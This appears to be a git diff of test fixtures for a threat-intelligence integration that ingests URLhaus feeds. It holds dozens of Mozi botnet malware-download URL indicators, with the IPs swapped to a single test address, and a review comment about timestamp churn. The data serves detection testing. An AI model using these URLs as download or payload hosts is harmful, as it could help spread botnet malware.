+{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://89.160.20.156:33201/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://89.160.20.156:53926/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://89.160.20.156:43917/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://89.160.20.156:42053/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://89.160.20.156:57875/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://89.160.20.156:35523/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://89.160.20.156:47418/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://89.160.20.156:53007/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://89.160.20.156:38089/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://89.160.20.156:35243/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://89.160.20.156:50589/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://89.160.20.156:42479/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://89.160.20.156:43425/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://89.160.20.156:35013/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://89.160.20.156:35298/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://89.160.20.156:54174/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://89.160.20.156:42768/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://89.160.20.156:59110/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://89.160.20.156:51476/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://89.160.20.156:58839/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://89.160.20.156:50249/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://89.160.20.156:46173/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://89.160.20.156:43785/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://89.160.20.156:46924/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://89.160.20.156:59734/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://89.160.20.156:51620/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://89.160.20.156:42585/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://89.160.20.156:57941/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://89.160.20.156:38308/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://89.160.20.156:55281/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://89.160.20.156:57662/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://89.160.20.156:40738/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://89.160.20.156:59018/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:22:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://89.160.20.156:60279/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://89.160.20.156:52738/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://89.160.20.156:37394/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://89.160.20.156:56491/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://89.160.20.156:46067/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json index ce028c32b33..1afae375bb2 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json @@ -29,18 +29,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.72.223.103:34613/Mozi.m", + "original": "http://89.160.20.156:34613/Mozi.m", "scheme": "http", "port": 34613, - "domain": "103.72.223.103", - "full": "http://103.72.223.103:34613/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34613/Mozi.m" }, - "ip": "103.72.223.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692215997Z", - "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://103.72.223.103:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.72.223.103\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024388900Z", + "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://89.160.20.156:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
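Review bot: The `event.ingested` rewrite in this hunk (from `"2021-12-13T06:08:08.692215997Z"` to `"2021-12-13T08:40:08.024388900Z"`) is regeneration noise unrelated to the IP substitution the commit describes, and the same churn appears in every other hunk of this file section, from `@@ -78,18 +78,18 @@` through `@@ -960,18 +960,18 @@`. Roughly a quarter of the changed lines per hunk are therefore timestamp deltas that reviewers have to skip over to see the real change. If this data stream's pipeline test config does not already mark the field as dynamic, declaring it there — `dynamic_fields:` followed by `  event.ingested: ".*"` — would let the expected file stop changing on every regeneration; I am inferring from the per-record nanosecond values that the file was regenerated rather than hand-edited, so please confirm. The IP substitution itself looks consistent across `url.original`, `url.domain`, `url.full`, `threat.indicator.ip` and `event.original` in each record.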
@@ -78,18 +78,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.30.97.184:44941/Mozi.m", + "original": "http://89.160.20.156:44941/Mozi.m", "scheme": "http", "port": 44941, - "domain": "112.30.97.184", - "full": "http://112.30.97.184:44941/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44941/Mozi.m" }, - "ip": "112.30.97.184" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692233941Z", - "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://112.30.97.184:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.97.184\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024427700Z", + "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://89.160.20.156:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -127,18 +127,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.110.198.53:37173/Mozi.m", + "original": "http://89.160.20.156:37173/Mozi.m", "scheme": "http", "port": 37173, - "domain": "113.110.198.53", - "full": "http://113.110.198.53:37173/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37173/Mozi.m" }, - "ip": "113.110.198.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692239100Z", - "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://113.110.198.53:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.110.198.53\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024435500Z", + "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://89.160.20.156:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -176,18 +176,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.20.183.170:47545/Mozi.m", + "original": "http://89.160.20.156:47545/Mozi.m", "scheme": "http", "port": 47545, - "domain": "101.20.183.170", - "full": "http://101.20.183.170:47545/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47545/Mozi.m" }, - "ip": "101.20.183.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692242827Z", - "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://101.20.183.170:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"101.20.183.170\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024442600Z", + "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://89.160.20.156:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -225,18 +225,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.8.35.22:44782/Mozi.a", + "original": "http://89.160.20.156:44782/Mozi.a", "scheme": "http", "port": 44782, - "domain": "59.8.35.22", - "full": "http://59.8.35.22:44782/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44782/Mozi.a" }, - "ip": "59.8.35.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692267133Z", - "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://59.8.35.22:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.8.35.22\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024449900Z", + "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://89.160.20.156:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -274,18 +274,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.96.37.35:44359/Mozi.a", + "original": "http://89.160.20.156:44359/Mozi.a", "scheme": "http", "port": 44359, - "domain": "59.96.37.35", - "full": "http://59.96.37.35:44359/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44359/Mozi.a" }, - "ip": "59.96.37.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692273735Z", - "original": "{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://59.96.37.35:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.96.37.35\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024457300Z", + "original": "{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://89.160.20.156:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -323,18 +323,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.239.233.17:56507/Mozi.m", + "original": "http://89.160.20.156:56507/Mozi.m", "scheme": "http", "port": 56507, - "domain": "42.239.233.17", - "full": "http://42.239.233.17:56507/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56507/Mozi.m" }, - "ip": "42.239.233.17" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692278114Z", - "original": "{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://42.239.233.17:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.239.233.17\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024464600Z", + "original": "{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://89.160.20.156:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -372,18 +372,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.252.178.20:57562/Mozi.m", + "original": "http://89.160.20.156:57562/Mozi.m", "scheme": "http", "port": 57562, - "domain": "58.252.178.20", - "full": "http://58.252.178.20:57562/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57562/Mozi.m" }, - "ip": "58.252.178.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692281921Z", - "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://58.252.178.20:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.252.178.20\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024471800Z", + "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://89.160.20.156:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -421,18 +421,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.176.111.95:48845/Mozi.m", + "original": "http://89.160.20.156:48845/Mozi.m", "scheme": "http", "port": 48845, - "domain": "45.176.111.95", - "full": "http://45.176.111.95:48845/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48845/Mozi.m" }, - "ip": "45.176.111.95" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692285407Z", - "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://45.176.111.95:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.176.111.95\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024479Z", + "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://89.160.20.156:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
